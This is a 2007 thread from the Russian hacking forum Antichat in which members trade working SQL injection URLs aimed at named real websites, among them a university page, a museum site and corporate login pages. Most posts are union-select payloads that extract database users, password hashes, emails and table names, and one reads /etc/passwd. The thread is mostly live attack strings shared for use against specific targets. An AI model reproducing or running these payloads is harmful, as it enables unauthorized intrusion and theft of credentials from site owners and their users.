ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #1021  
Старый 14.03.2007, 19:00
Аватар для Spyder
Spyder
Members of Antichat - Level 5
Регистрация: 09.10.2006
Сообщений: 1,698
Провел на форуме:
9098076

Репутация: 4303


По умолчанию

там PostgreSQL
вот тебе циферка
Цитата:
http://mrce.wustl.edu/index.php?id=dynamic_page&itemid=-7+union+select+null,null,to_char(1,123)--
 
Ответить с цитированием

  #1022  
Старый 14.03.2007, 19:15
Аватар для p-range
p-range
Участник форума
Регистрация: 05.02.2006
Сообщений: 168
Провел на форуме:
749524

Репутация: 715
Отправить сообщение для p-range с помощью ICQ
По умолчанию

хм
Цитата:
http://artmuseum.kaluga.ru/print.php?cont=expo_info&id_edit=-1+union+select+1,2,concat(user,0x3a,password)+from +mysql.user/*
Цитата:
http://artmuseum.kaluga.ru/print.php?cont=expo_info&id_edit=-1+union+select+1,2,load_file('/etc/passwd')+from+mysql.user/*
 
Ответить с цитированием

  #1023  
Старый 14.03.2007, 19:16
Аватар для Colkru
Colkru
Участник форума
Регистрация: 13.01.2007
Сообщений: 160
Провел на форуме:
865816

Репутация: 181
Отправить сообщение для Colkru с помощью ICQ
По умолчанию

Код:
http://www.bathtubmusic.com/album.php?id=-1+union+select+1,2,version(),4/*
 
Ответить с цитированием

  #1024  
Старый 14.03.2007, 19:44
Аватар для Grey
Grey
AMA - Level 2
Регистрация: 10.06.2006
Сообщений: 1,113
Провел на форуме:
17668503

Репутация: 5826


По умолчанию

Люблю когда все так четко)

Код:
http://www.rif.bz/index.php?m=catalog&cat_con=-1+union+select+1,2,3,convert(version(),char),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22/*
http://www.rif.bz/index.php?m=catalog&cat_con=-1+union+select+1,2,3,convert(table_name,char),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22+from+information_schema.tables/*
http://www.rif.bz/index.php?m=catalog&cat_con=-1+union+select+1,2,3,convert(column_name,char),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22+from+information_schema.columns+where+table_name="SiteUser"/*
http://www.rif.bz/index.php?m=catalog&cat_con=-1+union+select+1,2,3,convert(concat(user_id,char(58),user_login,char(58),user_pass,char(58),user_name),char),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22+from+SiteUser/*
 
Ответить с цитированием

  #1025  
Старый 14.03.2007, 20:47
Аватар для Ksander
Ksander
Постоянный
Регистрация: 21.06.2006
Сообщений: 931
Провел на форуме:
4836047

Репутация: 930


По умолчанию

немного отойдя от шока продолжу своё неблагодарное дело =(




Код:
http://sex.dp.ua/topic.php?categor=-1+union+select+1,concat(login,char(58),password),3,4+from+users+limit+0,1/*
 
Ответить с цитированием

  #1026  
Старый 14.03.2007, 20:52
Аватар для Grey
Grey
AMA - Level 2
Регистрация: 10.06.2006
Сообщений: 1,113
Провел на форуме:
17668503

Репутация: 5826


По умолчанию

Код:
http://www.imhoclub.ru/books/?did=-1+union+select+1,concat(database(),char(58),user(),char(58),version())/*
Код:
http://www.ugweekend.ru/index.php?mag=07&nid=-1+union+select+1,2,concat(database(),char(58),user(),char(58),version())/*
Код:
http://www.trizway.com/seminar.php?id=-1+union+select+1,2,3,4,5,6,7,convert(concat(database(),char(58),user(),char(58),version()),char),9,10,11/*
http://www.trizway.com/seminar.php?id=-1+union+select+1,2,3,4,5,6,7,convert(email,char),9,10,11+from+author/*
 
Ответить с цитированием

  #1027  
Старый 14.03.2007, 21:03
Аватар для }{0TT@БЬ)Ч
}{0TT@БЬ)Ч
Постоянный
Регистрация: 20.01.2006
Сообщений: 302
Провел на форуме:
3536885

Репутация: 447
По умолчанию

Цитата:
Сообщение от VampiRUS  
http://mrce.wustl.edu/index.php?id=dynamic_page&itemid=7+union+select+1, 2,3--
ERROR: UNION types character varying and integer cannot be matched
http://mrce.wustl.edu/index.php?id=dynamic_page&itemid=-40+union+select+null,TABLE_NAME,null+FROM+INFORMAT ION_SCHEMA.TABLES--
но хз как перебирать

Последний раз редактировалось }{0TT@БЬ)Ч; 14.03.2007 в 21:06..
 
Ответить с цитированием

  #1028  
Старый 14.03.2007, 21:08
Аватар для Constantine
Constantine
Members of Antichat - Level 5
Регистрация: 24.11.2006
Сообщений: 927
Провел на форуме:
7192869

Репутация: 3033


По умолчанию

mssql
Код:
http://www.opentext.com/news/pr.html?id=1772+or+1772=@@version--
Код:
http://www.sumtotalsystems.com/success/login_global.html?id=-1+union+select+1,2,3,4,5,6,7,8,9+from+regusers/*
__________________

Дети индиго - это бездари, не надо песен! В пять лет едва говорить начинают, мы в этом возрасте стихи наизусть читали!

з.ы http://www.youtube.com/watch?v=sNsQe0KByRY Я ПлакалЪ
 
Ответить с цитированием

  #1029  
Старый 14.03.2007, 21:16
Аватар для n1†R0x
n1†R0x
Постоянный
Регистрация: 20.01.2007
Сообщений: 787
Провел на форуме:
2924346

Репутация: 1719


Отправить сообщение для n1†R0x с помощью ICQ
По умолчанию

Код:
http://www.spoono.com/photoshop/tutorials/tutorial.php?id=-1+union+select+1,concat(user,0x3a,password),3,4,5,6,7,8,9,10+from+users+limit+0,1/*
юзеров 6, смотрим в тайтл.
md5 вроде


upd://
Код:
http://www.yuldash.com/tg/index.php?id=-1+union+select+version(),2,3,4,5,6,7/*&q=mes&pp=7

Последний раз редактировалось n1†R0x; 14.03.2007 в 21:42..
 
Ответить с цитированием

  #1030  
Старый 14.03.2007, 22:50
Аватар для Spyder
Spyder
Members of Antichat - Level 5
Регистрация: 09.10.2006
Сообщений: 1,698
Провел на форуме:
9098076

Репутация: 4303


По умолчанию

Хотабыч
запрос должен выглядеть примерно так
Цитата:
http://mrce.wustl.edu/index.php?id=dynamic_page&itemid=-40+union+select+null,TABLE_NAME,null+FROM+INFORMAT ION_SCHEMA.TABLES+limit+1+offset+2--

Последний раз редактировалось Spyder; 14.03.2007 в 23:02..
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Обнаружение Sql инъекций в Oracle, часть вторая k00p3r Чужие Статьи 0 13.06.2005 11:26
SQL инъекция и Oracle, часть 2 k00p3r Чужие Статьи 0 13.06.2005 11:24
Sql инъекция и Oracle, часть первая k00p3r Чужие Статьи 0 13.06.2005 11:23
Внедрение Sql кода с завязанными глазами k00p3r Чужие Статьи 0 12.06.2005 20:48
SQL Injection в Oracle k00p3r Чужие Статьи 0 12.06.2005 12:41



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ